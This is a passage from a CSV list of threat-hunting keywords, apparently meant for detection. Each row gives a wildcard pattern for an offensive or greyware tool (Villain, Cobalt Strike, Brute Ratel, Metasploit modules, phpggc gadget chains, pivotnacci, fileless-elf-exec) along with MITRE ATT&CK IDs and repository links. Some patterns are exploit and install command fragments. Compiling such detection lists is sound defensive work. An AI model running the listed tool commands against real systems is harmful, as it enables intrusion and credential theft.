and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_proc_open_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*PHP-Code-injection.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*PHP-Code-Injections-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*phpggc -l*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*phpggc monolog/rce1 assert 'phpinfo()'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*phpggc symfony/rce1 id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*phpmyadmin_credsteal.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PhpSploit*","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2024","452","2023-08-23T13:08:08Z","2014-05-21T19:43:03Z" +"*phra/Pezor/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*phuip-fpizdam*","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1766","261","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" +"*piata_ssh_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PIC-Exec*runshellcode.asm*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*PIC-Exec\addresshunter*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*PIC-Get-Privileges*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*-PID * -Assembly * -Arguments *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*ping -n 10 localhost > nul*","greyware_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*pingcastle*","offensive_tool_keyword","pingcastle","active directory weakness scan","T1018 - T1046 - T1069 - T1087 - T1136 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.pingcastle.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PingCastle.cs*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","0","N/A","N/A",,"N/A",,, +"*PingCastle.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*ping-sweep*","offensive_tool_keyword","ping-sweep","Wrapper around the ping utility included by the OS. used for recon actiivities","T1016 - T1046","TA0007","N/A","N/A","Information Gathering","https://github.com/libresec/ping-sweep","1","0","N/A","N/A","1","1","0","2016-08-22T15:16:01Z","2016-08-22T02:07:46Z" +"*PinoyWH1Z/AoratosWin*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*PinoyWH1Z/AoratosWin*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*pip install exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pip install rarce*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*pip install --user fee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*pip* install updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*pip3 install bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*pip3 install -U pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*'pipename_stager'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*PipeViewer.csproj*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*PipeViewer_v1.1.zip*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*PipeViewer-main*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*pipx install fee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*Pitty Tiger RAT*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*pivot_smb \*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*pivot_winrm *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*pivotnacci http*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci -*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci *--polling-interval*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci/0.0.1*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci-master*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivots/named-pipe_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*-pk8gege.org*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*pkexec64.tar.gz*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*pkt_comm/word_gen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pkt_comm/word_list*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pktmon start*","greyware_tool_keyword","pktmon","pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*plex_unpickle_dict_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*plpmggfglncceinmilojdkiijhmajkjh*","greyware_tool_keyword","Red Panda VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*plug_getpass_nps.dll*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*plug_katz_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*plug_qvte_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 